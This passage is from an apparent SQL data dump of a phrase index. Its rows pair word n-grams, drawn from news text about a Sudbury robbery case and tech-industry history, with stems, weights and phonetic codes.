i',0,1,1.2333,'S500',1,'en'),(40724,'say i\'m sorry','sai i sorry',0,1,1.4333,'S526',1,'en'),(40725,'school diploma','school diploma',0,1,1.4667,'S43145',1,'en'),(40726,'school diploma come','school diploma come',0,1,1.6333,'S4314525',1,'en'),(40727,'scraped','scrape',0,0,0.4667,'S613',1,'en'),(40728,'scraped knee','scrape knee',0,1,1.4,'S61325',1,'en'),(40729,'scraped knee defence','scrape knee defence',0,1,1.6667,'S613253152',1,'en'),(40730,'selected him','select him',0,1,1.4,'S4235',1,'en'),(40731,'selected him by','select him by',0,1,1.5,'S42351',1,'en'),(40732,'selfishness','selfish',0,0,0.7333,'S41252',1,'en'),(40733,'selfishness that','selfish that',0,1,1.5333,'S412523',1,'en'),(40734,'selfishness that has','selfish that has',0,1,1.6667,'S4125232',1,'en'),(40735,'sentence','sentenc',0,0,0.5333,'S5352',1,'en'),(40736,'sentence humphrey','sentenc humphrey',0,1,1.5667,'S5352516',1,'en'),(40737,'sentence humphrey issued','sentenc humphrey issued',0,1,1.8,'S535251623',1,'en'),(40738,'serious offence','seriou offence',0,1,1.5,'S62152',1,'en'),(40739,'serious offence it','seriou offence it',0,1,1.6,'S621523',1,'en'),(40740,'shame','shame',0,0,0.3333,'S500',1,'en'),(40741,'shame i','shame i',0,1,1.2333,'S500',1,'en'),(40742,'shame i was','shame i was',0,1,1.3667,'S520',1,'en'),(40743,'she needed','she needed',0,1,1.3333,'S530',1,'en'),(40744,'she needed once','she needed once',0,1,1.5,'S5352',1,'en'),(40745,'she tackled','she tackled',0,1,1.3667,'S3243',1,'en'),(40746,'she tackled the','she tackled the',0,1,1.5,'S3243',1,'en'),(40747,'she told','she told',0,1,1.2667,'S343',1,'en'),(40748,'she told me','she told me',0,1,1.3667,'S3435',1,'en'),(40749,'she was offended','she was offended',0,1,1.5333,'S153',1,'en'),(40750,'shirt behind','shirt behind',0,1,1.4,'S63153',1,'en'),(40751,'shirt behind while','shirt behind while',0,1,1.6,'S631534',1,'en'),(40752,'shop assistant','shop assistant',0,1,1.4667,'S12353',1,'en'),(40753,'shop assistant at','shop assistant at',0,1,1.5667,'S12353',1,'en'),(40754,'shop she','shop she',0,1,1.2667,'S120',1,'en'),(40755,'shop she tackled','shop she tackled',0,1,1.5333,'S123243',1,'en'),(40756,'short of','short of',0,1,1.2667,'S631',1,'en'),(40757,'short of completing','short of completing',0,1,1.6333,'S6312514352',1,'en'),(40758,'short while later','short while later',0,1,1.5667,'S63436',1,'en'),(40759,'shown the','shown the',0,1,1.3,'S530',1,'en'),(40760,'shown the chain','shown the chain',0,1,1.5,'S5325',1,'en'),(40761,'side','side',0,0,0.2667,'S300',1,'en'),(40762,'side grabbed','side grabbed',0,1,1.4,'S32613',1,'en'),(40763,'side grabbed cromarty\'s','side grabbed cromarty',0,1,1.7667,'S32613265632',1,'en'),(40764,'simply facing','simpli facing',0,1,1.4333,'S5141252',1,'en'),(40765,'simply facing charges','simpli facing charges',0,1,1.7,'S514125262',1,'en'),(40766,'snugly','snugli',0,0,0.4,'S524',1,'en'),(40767,'snugly as','snugli as',0,1,1.3,'S5242',1,'en'),(40768,'snugly as i','snugli as i',0,1,1.3667,'S5242',1,'en'),(40769,'soloman','soloman',0,0,0.4667,'S450',1,'en'),(40770,'soloman and','soloman and',0,1,1.3667,'S453',1,'en'),(40771,'soloman and 60','soloman and 60',0,1,1.4667,'S453',1,'en'),(40772,'someone humphrey','someon humphrey',0,1,1.5333,'S516',1,'en'),(40773,'someone humphrey reminded','someon humphrey reminded',0,1,1.8333,'S51653',1,'en'),(40774,'sorry','sorri',0,0,0.3333,'S600',1,'en'),(40775,'sorry to','sorri to',0,1,1.2667,'S630',1,'en'),(40776,'sorry to the','sorri to the',0,1,1.4,'S630',1,'en'),(40777,'squeezed','squeez',0,0,0.5333,'S300',1,'en'),(40778,'squeezed free','squeez free',0,1,1.4333,'S316',1,'en'),(40779,'squeezed free and','squeez free and',0,1,1.5667,'S31653',1,'en'),(40780,'squirmed','squirm',0,0,0.5333,'S653',1,'en'),(40781,'squirmed free','squirm free',0,1,1.4333,'S65316',1,'en'),(40782,'squirmed free and','squirm free and',0,1,1.5667,'S6531653',1,'en'),(40783,'star a','star a',0,1,1.2,'S360',1,'en'),(40784,'star a few','star a few',0,1,1.3333,'S361',1,'en'),(40785,'start this','start this',0,1,1.3333,'S3632',1,'en'),(40786,'start this is','start this is',0,1,1.4333,'S3632',1,'en'),(40787,'started','start',0,0,0.4667,'S363',3,'en'),(40788,'started off','start off',0,1,1.3667,'S3631',1,'en'),(40789,'started off as','start off as',0,1,1.4667,'S36312',1,'en'),(40790,'started walking','start walking',0,1,1.5,'S3634252',1,'en'),(40791,'started walking toward','start walking toward',0,1,1.7333,'S3634252363',1,'en'),(40792,'stealing','steal',0,0,0.5333,'S3452',1,'en'),(40793,'stealing from','steal from',0,1,1.4333,'S3452165',1,'en'),(40794,'stealing from people','steal from people',0,1,1.6667,'S345216514',1,'en'),(40795,'still he','still he',0,1,1.2667,'S340',1,'en'),(40796,'still he squeezed','still he squeezed',0,1,1.5667,'S3423',1,'en'),(40797,'store will','store will',0,1,1.3333,'S364',1,'en'),(40798,'store will pay','store will pay',0,1,1.4667,'S3641',1,'en'),(40799,'submission','submiss',0,0,0.6667,'S1525',1,'en'),(40800,'submission by','submiss by',0,1,1.4333,'S15251',1,'en'),(40801,'submission by beckett','submiss by beckett',0,1,1.7,'S1525123',1,'en'),(40802,'sudbury','sudburi',0,0,0.4667,'S316',1,'en'),(40803,'sudbury gets','sudburi gets',0,1,1.4,'S316232',1,'en'),(40804,'sudbury gets jail','sudburi gets jail',0,1,1.5667,'S3162324',1,'en'),(40805,'suffering','suffer',0,0,0.6,'S1652',1,'en'),(40806,'suffering alcohol','suffer alcohol',0,1,1.5667,'S1652424',1,'en'),(40807,'suffering alcohol addiction','suffer alcohol addiction',0,1,1.9,'S16524243235',1,'en'),(40808,'surprised i','surpris i',0,1,1.3667,'S61623',1,'en'),(40809,'surprised i selected','surpris i selected',0,1,1.6667,'S616232423',1,'en'),(40810,'surprised i was','surpris i was',0,1,1.5,'S616232',1,'en'),(40811,'syndrome','syndrom',0,0,0.5333,'S5365',1,'en'),(40812,'syndrome for','syndrom for',0,1,1.4,'S536516',1,'en'),(40813,'syndrome for about','syndrom for about',0,1,1.6,'S53651613',1,'en'),(40814,'tackled','tackl',0,0,0.4667,'T243',1,'en'),(40815,'tackled by','tackl by',0,1,1.3333,'T2431',1,'en'),(40816,'tackled by three','tackl by three',0,1,1.5333,'T243136',1,'en'),(40817,'tackled the','tackl the',0,1,1.3667,'T243',1,'en'),(40818,'tackled the may','tackl the may',0,1,1.5,'T2435',1,'en'),(40819,'talked','talk',0,0,0.4,'T423',1,'en'),(40820,'talked to','talk to',0,1,1.3,'T423',1,'en'),(40821,'talked to the','talk to the',0,1,1.4333,'T423',1,'en'),(40822,'tear','tear',0,0,0.2667,'T600',1,'en'),(40823,'tear down','tear down',0,1,1.3,'T635',1,'en'),(40824,'tear down this','tear down this',0,1,1.4667,'T63532',1,'en'),(40825,'that but','that but',0,1,1.2667,'T130',1,'en'),(40826,'that but i','that but i',0,1,1.3333,'T130',1,'en'),(40827,'that cromarty','that cromarty',0,1,1.4333,'T26563',1,'en'),(40828,'that cromarty had','that cromarty had',0,1,1.5667,'T26563',1,'en'),(40829,'that cromarty only','that cromarty only',0,1,1.6,'T2656354',1,'en'),(40830,'that is where','that is where',0,1,1.4333,'T260',1,'en'),(40831,'the arm','the arm',0,1,1.2333,'T650',1,'en'),(40832,'the arm and','the arm and',0,1,1.3667,'T653',1,'en'),(40833,'the beginer','the beginer',0,1,1.3667,'T1256',1,'en'),(40834,'the beginer you','the beginer you',0,1,1.5,'T1256',1,'en'),(40835,'the chain','the chain',0,1,1.3,'T250',1,'en'),(40836,'the chain by','the chain by',0,1,1.4,'T251',1,'en'),(40837,'the chain providing','the chain providing',0,1,1.6333,'T25161352',1,'en'),(40838,'the chain was','the chain was',0,1,1.4333,'T252',1,'en'),(40839,'the chains','the chains',0,1,1.3333,'T252',1,'en'),(40840,'the chains and','the chains and',0,1,1.4667,'T25253',1,'en'),(40841,'the court','the court',0,1,1.3,'T263',1,'en'),(40842,'the court wednesday','the court wednesday',0,1,1.6333,'T263523',1,'en'),(40843,'the door','the door',0,1,1.2667,'T600',2,'en'),(40844,'the door and','the door and',0,1,1.4,'T653',1,'en'),(40845,'the door richard','the door richard',0,1,1.5333,'T6263',1,'en'),(40846,'the feminine','the feminine',0,1,1.4,'T150',1,'en'),(40847,'the feminine employee','the feminine employee',0,1,1.7,'T1514',1,'en'),(40848,'the flip','the flip',0,1,1.2667,'T141',1,'en'),(40849,'the flip side','the flip side',0,1,1.4333,'T14123',1,'en'),(40850,'the fuel','the fuel',0,1,1.2667,'T140',1,'en'),(40851,'the fuel she','the fuel she',0,1,1.4,'T142',1,'en'),(40852,'the ladies','the ladies',0,1,1.3333,'T432',1,'en'),(40853,'the ladies who','the ladies who',0,1,1.4667,'T432',1,'en'),(40854,'the man\'s','the man',0,1,1.3,'T520',1,'en'),(40855,'the man\'s boldness','the man boldness',0,1,1.6,'T5214352',1,'en'),(40856,'the may be','the may be',0,1,1.3333,'T510',1,'en'),(40857,'the melee','the melee',0,1,1.3,'T540',1,'en'),(40858,'the melee about','the melee about',0,1,1.5,'T5413',1,'en'),(40859,'the national','the national',0,1,1.4,'T5354',1,'en'),(40860,'the national dna','the national dna',0,1,1.5333,'T535435',1,'en'),(40861,'the ontario','the ontario',0,1,1.3667,'T536',1,'en'),(40862,'the ontario court','the ontario court',0,1,1.5667,'T536263',1,'en'),(40863,'the other hand','the other hand',0,1,1.4667,'T653',1,'en'),(40864,'the prisoner\'s','the prisoner',0,1,1.4667,'T162562',1,'en'),(40865,'the prisoner\'s box','the prisoner box',0,1,1.6,'T16256212',1,'en'),(40866,'the robbery','the robbery',0,1,1.3667,'T616',1,'en'),(40867,'the robbery attempt','the robbery attempt',0,1,1.6333,'T6163513',1,'en'),(40868,'the robbery cromarty','the robbery cromarty',0,1,1.6667,'T61626563',1,'en'),(40869,'the shop','the shop',0,1,1.2667,'T210',1,'en'),(40870,'the shop she','the shop she',0,1,1.4,'T212',1,'en'),(40871,'the star','the star',0,1,1.2667,'T236',1,'en'),(40872,'the star a','the star a',0,1,1.3333,'T236',1,'en'),(40873,'the three','the three',0,1,1.3,'T600',1,'en'),(40874,'the three workers','the three workers',0,1,1.5667,'T6262',1,'en'),(40875,'the wrong','the wrong',0,1,1.3,'T652',1,'en'),(40876,'the wrong to','the wrong to',0,1,1.4,'T6523',1,'en'),(40877,'theft','theft',0,0,0.3333,'T130',1,'en'),(40878,'theft and','theft and',0,1,1.3,'T1353',1,'en'),(40879,'theft and infiltration','theft and infiltration',0,1,1.7333,'T13535143635',1,'en'),(40880,'their funds','their funds',0,1,1.3667,'T61532',1,'en'),(40881,'their funds who','their funds who',0,1,1.5,'T61532',1,'en'),(40882,'then accompanied','then accompanied',0,1,1.5333,'T525153',1,'en'),(40883,'then accompanied by','then accompanied by',0,1,1.6333,'T5251531',1,'en'),(40884,'then of','then of',0,1,1.2333,'T510',1,'en'),(40885,'then of the','then of the',0,1,1.3667,'T513',1,'en'),(40886,'thief','thief',0,0,0.3333,'T100',1,'en'),(40887,'thief by','thief by',0,1,1.2667,'T100',1,'en'),(40888,'thief by his','thief by his',0,1,1.4,'T120',1,'en'),(40889,'thief in','thief in',0,1,1.2667,'T150',1,'en'),(40890,'thief in sudbury','thief in sudbury',0,1,1.5333,'T152316',1,'en'),(40891,'thief where','thief where',0,1,1.3667,'T160',1,'en'),(40892,'thief where do','thief where do',0,1,1.4667,'T163',1,'en'),(40893,'think that is','think that is',0,1,1.4333,'T5232',1,'en'),(40894,'thinking about receiving','think about receiving',0,1,1.8,'T52521362152',1,'en'),(40895,'this and','thi and',0,1,1.2667,'T253',1,'en'),(40896,'this and that','thi and that',0,1,1.4333,'T253',1,'en'),(40897,'this guy\',','thi guy',0,1,1.3333,'T200',1,'en'),(40898,'this guy\', she','thi guy she',0,1,1.4667,'T200',1,'en'),(40899,'this is a','thi is a',0,1,1.3,'T200',1,'en'),(40900,'three employees','three employees',0,1,1.5,'T65142',1,'en'),(40901,'three employees at','three employees at',0,1,1.6,'T651423',1,'en'),(40902,'three workers','three workers',0,1,1.4333,'T6262',1,'en'),(40903,'three workers said','three workers said',0,1,1.6,'T62623',1,'en'),(40904,'through a','through a',0,1,1.3,'T620',1,'en'),(40905,'through a lot','through a lot',0,1,1.4333,'T6243',1,'en'),(40906,'through doing','through doing',0,1,1.4333,'T62352',1,'en'),(40907,'through doing this','through doing this',0,1,1.6,'T6235232',1,'en'),(40908,'to assault','to assault',0,1,1.3333,'T243',1,'en'),(40909,'to assault anyone','to assault anyone',0,1,1.5667,'T2435',1,'en'),(40910,'to breach','to breach',0,1,1.3,'T162',1,'en'),(40911,'to breach of','to breach of',0,1,1.4,'T1621',1,'en'),(40912,'to escape','to escape',0,1,1.3,'T210',1,'en'),(40913,'to escape and','to escape and',0,1,1.4333,'T2153',1,'en'),(40914,'to hear','to hear',0,1,1.2333,'T600',1,'en'),(40915,'to hear about','to hear about',0,1,1.4333,'T613',1,'en'),(40916,'to her','to her',0,1,1.2,'T600',1,'en'),(40917,'to her assistance','to her assistance',0,1,1.5667,'T62352',1,'en'),(40918,'to recieve','to recieve',0,1,1.3333,'T621',1,'en'),(40919,'to recieve a','to recieve a',0,1,1.4,'T621',1,'en'),(40920,'to restrain','to restrain',0,1,1.3667,'T62365',1,'en'),(40921,'to restrain him','to restrain him',0,1,1.5,'T62365',1,'en'),(40922,'to robbery','to robbery',0,1,1.3333,'T616',1,'en'),(40923,'to robbery justice','to robbery justice',0,1,1.6,'T616232',1,'en'),(40924,'to say','to say',0,1,1.2,'T200',1,'en'),(40925,'to say i\'m','to say i',0,1,1.3333,'T250',1,'en'),(40926,'to start','to start',0,1,1.2667,'T2363',2,'en'),(40927,'to start this','to start this',0,1,1.4333,'T23632',1,'en'),(40928,'to tear','to tear',0,1,1.2333,'T600',1,'en'),(40929,'to tear down','to tear down',0,1,1.4,'T635',1,'en'),(40930,'to the door','to the door',0,1,1.3667,'T600',1,'en'),(40931,'to the national','to the national',0,1,1.5,'T5354',1,'en'),(40932,'to the star','to the star',0,1,1.3667,'T236',1,'en'),(40933,'to the three','to the three',0,1,1.4,'T600',1,'en'),(40934,'to theft','to theft',0,1,1.2667,'T130',1,'en'),(40935,'to theft and','to theft and',0,1,1.4,'T1353',1,'en'),(40936,'to walk','to walk',0,1,1.2333,'T420',1,'en'),(40937,'to walk out','to walk out',0,1,1.3667,'T423',1,'en'),(40938,'told him','told him',0,1,1.2667,'T435',1,'en'),(40939,'told him \'hey','told him hey',0,1,1.4333,'T435',1,'en'),(40940,'told me','told me',0,1,1.2333,'T435',1,'en'),(40941,'told me grabbed','told me grabbed',0,1,1.5,'T4352613',1,'en'),(40942,'told the','told the',0,1,1.2667,'T430',1,'en'),(40943,'told the court','told the court',0,1,1.4667,'T43263',1,'en'),(40944,'toward','toward',0,0,0.4,'T630',1,'en'),(40945,'toward the','toward the',0,1,1.3333,'T630',1,'en'),(40946,'toward the door','toward the door',0,1,1.5,'T636',1,'en'),(40947,'tracks','track',0,0,0.4,'T620',1,'en'),(40948,'tracks after','track after',0,1,1.4,'T62136',1,'en'),(40949,'tracks after heavy','track after heavy',0,1,1.6,'T621361',1,'en'),(40950,'tried to restrain','tri to restrain',0,1,1.5667,'T6362365',1,'en'),(40951,'trying to escape','try to escape',0,1,1.5333,'T652321',1,'en'),(40952,'two of','two of',0,1,1.2,'T100',1,'en'),(40953,'two of her','two of her',0,1,1.3333,'T160',1,'en'),(40954,'two other','two other',0,1,1.3,'T600',1,'en'),(40955,'two other female','two other female',0,1,1.5333,'T6154',1,'en'),(40956,'typography','typographi',0,0,0.6667,'T1261',1,'en'),(40957,'use a genetic','us a genetic',0,1,1.4333,'U2532',1,'en'),(40958,'used force','us force',0,1,1.3333,'U23162',1,'en'),(40959,'used force in','us force in',0,1,1.4333,'U231625',1,'en'),(40960,'using the chain','us the chain',0,1,1.5,'U252325',1,'en'),(40961,'very fortunate','veri fortunate',0,1,1.4667,'V616353',1,'en'),(40962,'very fortunate the','veri fortunate the',0,1,1.6,'V616353',1,'en'),(40963,'very good','veri good',0,1,1.3,'V623',1,'en'),(40964,'very good young','veri good young',0,1,1.5,'V62352',1,'en'),(40965,'very much\'','veri much',0,1,1.3333,'V652',1,'en'),(40966,'very much\' while','veri much while',0,1,1.5333,'V6524',1,'en'),(40967,'waiting on','wait on',0,1,1.3333,'W3525',1,'en'),(40968,'waiting on hold','wait on hold',0,1,1.5,'W352543',1,'en'),(40969,'waiting to','wait to',0,1,1.3333,'W3523',1,'en'),(40970,'waiting to hear','wait to hear',0,1,1.5,'W35236',1,'en'),(40971,'walk out','walk out',0,1,1.2667,'W423',1,'en'),(40972,'walk out with','walk out with',0,1,1.4333,'W423',1,'en'),(40973,'walking','walk',0,0,0.4667,'W4252',1,'en'),(40974,'walking toward','walk toward',0,1,1.4667,'W4252363',1,'en'),(40975,'walking toward the','walk toward the',0,1,1.6,'W4252363',1,'en'),(40976,'want to say','want to say',0,1,1.3667,'W532',1,'en'),(40977,'was arrested','wa arrested',0,1,1.4,'W2623',1,'en'),(40978,'was arrested a','wa arrested a',0,1,1.4667,'W2623',1,'en'),(40979,'was just waiting','wa just waiting',0,1,1.5333,'W2352',1,'en'),(40980,'was not recoverable','wa not recoverable',0,1,1.6333,'W253621614',1,'en'),(40981,'was offended','wa offended',0,1,1.4,'W2153',1,'en'),(40982,'was offended by','wa offended by',0,1,1.5,'W21531',1,'en'),(40983,'was on','wa on',0,1,1.2,'W250',1,'en'),(40984,'was on an','wa on an',0,1,1.3,'W250',1,'en'),(40985,'was shown','wa shown',0,1,1.3,'W250',1,'en'),(40986,'was shown the','wa shown the',0,1,1.4333,'W253',1,'en'),(40987,'was simply','wa simply',0,1,1.3333,'W2514',1,'en'),(40988,'was simply facing','wa simply facing',0,1,1.5667,'W25141252',1,'en'),(40989,'was stealing','wa stealing',0,1,1.4,'W23452',1,'en'),(40990,'was stealing from','wa stealing from',0,1,1.5667,'W23452165',1,'en'),(40991,'was surprised','wa surprised',0,1,1.4333,'W261623',1,'en'),(40992,'was surprised i','wa surprised i',0,1,1.5,'W261623',1,'en'),(40993,'was then','wa then',0,1,1.2667,'W235',1,'en'),(40994,'was then accompanied','wa then accompanied',0,1,1.6667,'W23525153',1,'en'),(40995,'was waiting','wa waiting',0,1,1.3667,'W2352',1,'en'),(40996,'was waiting to','wa waiting to',0,1,1.4667,'W23523',1,'en'),(40997,'wednesday that cromarty','wednesdai that cromarty',0,1,1.7667,'W352326563',1,'en'),(40998,'were involved','were involved',0,1,1.4333,'W651413',1,'en'),(40999,'were involved in','were involved in',0,1,1.5333,'W6514135',1,'en'),(41000,'were not','were not',0,1,1.2667,'W653',1,'en'),(41001,'were not earnestly','were not earnestly',0,1,1.6,'W65365234',1,'en'),(41002,'when he','when he',0,1,1.2333,'W500',2,'en'),(41003,'when he was','when he was',0,1,1.3667,'W520',2,'en'),(41004,'when i hurt','when i hurt',0,1,1.3667,'W563',1,'en'),(41005,'where do','where do',0,1,1.2667,'W630',2,'en'),(41006,'where do you','where do you',0,1,1.4,'W630',2,'en'),(41007,'where you need','where you need',0,1,1.4667,'W653',1,'en'),(41008,'while asleep','while asleep',0,1,1.4,'W4241',1,'en'),(41009,'while asleep on','while asleep on',0,1,1.5,'W42415',1,'en'),(41010,'while cromarty','while cromarty',0,1,1.4667,'W426563',1,'en'),(41011,'while cromarty was','while cromarty was',0,1,1.6,'W4265632',1,'en'),(41012,'while holding','while holding',0,1,1.4333,'W4352',1,'en'),(41013,'while holding among','while holding among',0,1,1.6333,'W435252',1,'en'),(41014,'while later','while later',0,1,1.3667,'W436',1,'en'),(41015,'while later the','while later the',0,1,1.5,'W4363',1,'en'),(41016,'who collected','who collected',0,1,1.4333,'W2423',1,'en'),(41017,'who collected minor','who collected minor',0,1,1.6333,'W242356',1,'en'),(41018,'who has','who has',0,1,1.2333,'W200',2,'en'),(41019,'who has lived','who has lived',0,1,1.4333,'W2413',1,'en'),(41020,'who tried','who tried',0,1,1.3,'W363',1,'en'),(41021,'who tried to','who tried to',0,1,1.4,'W363',1,'en'),(41022,'who was','who was',0,1,1.2333,'W200',1,'en'),(41023,'who was simply','who was simply',0,1,1.4667,'W2514',1,'en'),(41024,'who were','who were',0,1,1.2667,'W600',1,'en'),(41025,'who were involved','who were involved',0,1,1.5667,'W651413',1,'en'),(41026,'who work','who work',0,1,1.2667,'W620',1,'en'),(41027,'who work hard','who work hard',0,1,1.4333,'W6263',1,'en'),(41028,'who wriggled','who wriggled',0,1,1.4,'W6243',1,'en'),(41029,'who wriggled free','who wriggled free',0,1,1.5667,'W624316',1,'en'),(41030,'will pay','will pay',0,1,1.2667,'W410',1,'en'),(41031,'will pay out','will pay out',0,1,1.4,'W413',1,'en'),(41032,'with a gold','with a gold',0,1,1.3667,'W3243',1,'en'),(41033,'with drug','with drug',0,1,1.3,'W362',1,'en'),(41034,'with drug abuse','with drug abuse',0,1,1.5,'W36212',1,'en'),(41035,'with fibromyalgia','with fibromyalgia',0,1,1.5667,'W316542',1,'en'),(41036,'with fibromyalgia syndrome','with fibromyalgia syndrome',0,1,1.8667,'W3165425365',1,'en'),(41037,'with it','with it',0,1,1.2333,'W300',1,'en'),(41038,'with it i','with it i',0,1,1.3,'W300',1,'en'),(41039,'with leave','with leave',0,1,1.3333,'W341',1,'en'),(41040,'with leave the','with leave the',0,1,1.4667,'W3413',1,'en'),(41041,'woman who','woman who',0,1,1.3,'W500',1,'en'),(41042,'woman who collected','woman who collected',0,1,1.6333,'W52423',1,'en'),(41043,'work hard','work hard',0,1,1.3,'W6263',1,'en'),(41044,'work hard for','work hard for',0,1,1.4333,'W626316',1,'en'),(41045,'worker','worker',0,0,0.4,'W626',1,'en'),(41046,'worker cromarty','worker cromarty',0,1,1.5,'W62626563',1,'en'),(41047,'worker cromarty grabbed','worker cromarty grabbed',0,1,1.7667,'W626265632613',1,'en'),(41048,'workers','worker',0,0,0.4667,'W6262',1,'en'),(41049,'workers said','worker said',0,1,1.4,'W62623',1,'en'),(41050,'workers said byron','worker said byron',0,1,1.6,'W62623165',1,'en'),(41051,'wounded','wound',0,0,0.4667,'W530',1,'en'),(41052,'wounded august.31','wound august.31',0,1,1.5667,'W5323',1,'en'),(41053,'wounded august.31 and','wound august.31 and',0,1,1.7,'W532353',1,'en'),(41054,'wriggled','wriggl',0,0,0.5333,'W6243',1,'en'),(41055,'wriggled free','wriggl free',0,1,1.4333,'W624316',1,'en'),(41056,'wriggled free with','wriggl free with',0,1,1.6,'W6243163',1,'en'),(41057,'wrong to','wrong to',0,1,1.2667,'W6523',1,'en'),(41058,'wrong to breach','wrong to breach',0,1,1.5,'W6523162',1,'en'),(41059,'year in jail','year in jail',0,1,1.4,'Y6524',1,'en'),(41060,'year old linda','year old linda',0,1,1.4667,'Y643453',1,'en'),(41061,'year pistols','year pistols',0,1,1.4,'Y612342',1,'en'),(41062,'year pistols ban','year pistols ban',0,1,1.5333,'Y61234215',1,'en'),(41063,'years a','year a',0,1,1.2333,'Y620',1,'en'),(41064,'years a break','year a break',0,1,1.4333,'Y62162',1,'en'),(41065,'you are not','you are not',0,1,1.3667,'Y653',1,'en'),(41066,'you get pandora','you get pandora',0,1,1.5,'Y231536',2,'en'),(41067,'you have robbed','you have robbed',0,1,1.5,'Y1613',1,'en'),(41068,'you very','you very',0,1,1.2667,'Y160',1,'en'),(41069,'you very much\'','you very much',0,1,1.4667,'Y1652',1,'en'),(41070,'you woman','you woman',0,1,1.3,'Y500',1,'en'),(41071,'you woman who','you woman who',0,1,1.4333,'Y500',1,'en'),(41072,'young man','young man',0,1,1.3,'Y525',1,'en'),(41073,'young man and','young man and',0,1,1.4333,'Y5253',1,'en'),(41074,'your altercation','your altercation',0,1,1.5333,'Y6436235',1,'en'),(41075,'your altercation cromarty','your altercation cromarty',0,1,1.8333,'Y643623526563',1,'en'),(41076,'your attempted','your attempted',0,1,1.4667,'Y63513',1,'en'),(41077,'your attempted hesitation','your attempted hesitation',0,1,1.8333,'Y63513235',1,'en'),(41078,'\'i','i',0,0,0.1333,'I000',1,'en'),(41079,'\'i am','i am',0,1,1.1667,'I500',1,'en'),(41080,'\'i am here','i am here',0,1,1.3333,'I560',1,'en'),(41081,'12 year','12 year',0,1,1.2333,'Y600',1,'en'),(41082,'12 year absence','12 year absence',0,1,1.5,'Y61252',1,'en'),(41083,'12 years','12 years',0,1,1.2667,'Y620',1,'en'),(41084,'12 years later','12 years later',0,1,1.4667,'Y62436',1,'en'),(41085,'1900s','1900',0,0,0.3333,'S000',1,'en'),(41086,'1900s billy','1900 billy',0,1,1.3667,'S140',1,'en'),(41087,'1900s billy durant','1900 billy durant',0,1,1.6,'S143653',1,'en'),(41088,'1975','1975',0,0,0.4,'',1,'en'),(41089,'1975 yet','1975 yet',0,1,1.2667,'Y300',1,'en'),(41090,'1975 yet for','1975 yet for',0,1,1.4,'Y316',1,'en'),(41091,'1981','1981',0,0,0.4,'',1,'en'),(41092,'1981 and','1981 and',0,1,1.2667,'A530',1,'en'),(41093,'1981 and microsoft\'s','1981 and microsoft',0,1,1.6667,'A535262132',1,'en'),(41094,'1990s','1990',0,0,0.3333,'S000',1,'en'),(41095,'1990s almost','1990 almost',0,1,1.4,'S4523',1,'en'),(41096,'1990s almost led','1990 almost led',0,1,1.5333,'S452343',1,'en'),(41097,'1995','1995',0,0,0.4,'',1,'en'),(41098,'1995 and','1995 and',0,1,1.2667,'A530',1,'en'),(41099,'1995 and watched','1995 and watched',0,1,1.5333,'A5323',1,'en'),(41100,'1997','1997',0,0,0.4,'',1,'en'),(41101,'1997 after','1997 after',0,1,1.3333,'A136',1,'en'),(41102,'1997 after a','1997 after a',0,1,1.4,'A136',1,'en'),(41103,'20 percent','20 percent',0,1,1.3333,'P6253',1,'en'),(41104,'20 percent 12','20 percent 12',0,1,1.4333,'P6253',1,'en'),(41105,'2000','2000',0,0,0.4,'',1,'en'),(41106,'2000 microsoft','2000 microsoft',0,1,1.4667,'M26213',1,'en'),(41107,'2000 microsoft safe','2000 microsoft safe',0,1,1.6333,'M2621321',1,'en'),(41108,'2007 after','2007 after',0,1,1.3333,'A136',1,'en'),(41109,'2007 after the','2007 after the',0,1,1.4667,'A1363',1,'en'),(41110,'2007 when','2007 when',0,1,1.3,'W500',1,'en'),(41111,'2007 when he','2007 when he',0,1,1.4,'W500',1,'en'),(41112,'33','33',0,0,0.2,'',1,'en'),(41113,'33 years','33 years',0,1,1.2667,'Y620',1,'en'),(41114,'33 years gates','33 years gates',0,1,1.4667,'Y6232',1,'en'),(41115,'40','40',0,0,0.2,'',2,'en'),(41116,'40 years','40 years',0,1,1.2667,'Y620',1,'en'),(41117,'40 years dell','40 years dell',0,1,1.4333,'Y6234',1,'en'),(41118,'47.5','47.5',0,0,0.4,'',1,'en'),(41119,'47.5 billion','47.5 billion',0,1,1.4,'B450',1,'en'),(41120,'47.5 billion takeover','47.5 billion takeover',0,1,1.7,'B453216',1,'en'),(41121,'58','58',0,0,0.2,'',1,'en'),(41122,'58 year','58 year',0,1,1.2333,'Y600',1,'en'),(41123,'58 year old','58 year old',0,1,1.3667,'Y643',1,'en'),(41124,'60 percent','60 percent',0,1,1.3333,'P6253',1,'en'),(41125,'60 percent of','60 percent of',0,1,1.4333,'P62531',1,'en'),(41126,'93','93',0,0,0.2,'',1,'en'),(41127,'93 percent','93 percent',0,1,1.3333,'P6253',1,'en'),(41128,'93 percent of','93 percent of',0,1,1.4333,'P62531',1,'en'),(41129,'a \'i','a i',0,1,1.1333,'A000',1,'en'),(41130,'a \'i am','a i am',0,1,1.2333,'A500',1,'en'),(41131,'a 12','a 12',0,1,1.1333,'A000',1,'en'),(41132,'a 12 year','a 12 year',0,1,1.3,'A600',1,'en'),(41133,'a 47.5','a 47.5',0,1,1.2,'A000',1,'en'),(41134,'a 47.5 billion','a 47.5 billion',0,1,1.4667,'A145',1,'en'),(41135,'a billion','a billion',0,1,1.3,'A145',1,'en'),(41136,'a billion dollar','a billion dollar',0,1,1.5333,'A145346',1,'en'),(41137,'a builder','a builder',0,1,1.3,'A1436',1,'en'),(41138,'a builder famously','a builder famously',0,1,1.6,'A14361524',1,'en'),(41139,'a case','a case',0,1,1.2,'A200',1,'en'),(41140,'a case of','a case of',0,1,1.3,'A210',1,'en'),(41141,'a couple','a couple',0,1,1.2667,'A214',1,'en'),(41142,'a couple of','a couple of',0,1,1.3667,'A2141',1,'en'),(41143,'a director','a director',0,1,1.3333,'A36236',1,'en'),(41144,'a director and','a director and',0,1,1.4667,'A3623653',1,'en'),(41145,'a director at','a director at',0,1,1.4333,'A362363',1,'en'),(41146,'a financial','a financial',0,1,1.3667,'A1524',1,'en'),(41147,'a financial partner','a financial partner',0,1,1.6333,'A152416356',1,'en'),(41148,'a founder','a founder',0,1,1.3,'A1536',1,'en'),(41149,'a founder confronts','a founder confronts',0,1,1.6333,'A15362516532',1,'en'),(41150,'a good agent','a good agent',0,1,1.4,'A23253',1,'en'),(41151,'a goverment','a goverment',0,1,1.3667,'A21653',1,'en'),(41152,'a goverment ordered','a goverment ordered',0,1,1.6333,'A216536363',1,'en'),(41153,'a great site','a great site',0,1,1.4,'A26323',1,'en'),(41154,'a hash','a hash',0,1,1.2,'A200',1,'en'),(41155,'a hash of','a hash of',0,1,1.3,'A210',1,'en'),(41156,'a landscape','a landscape',0,1,1.3667,'A45321',1,'en'),(41157,'a 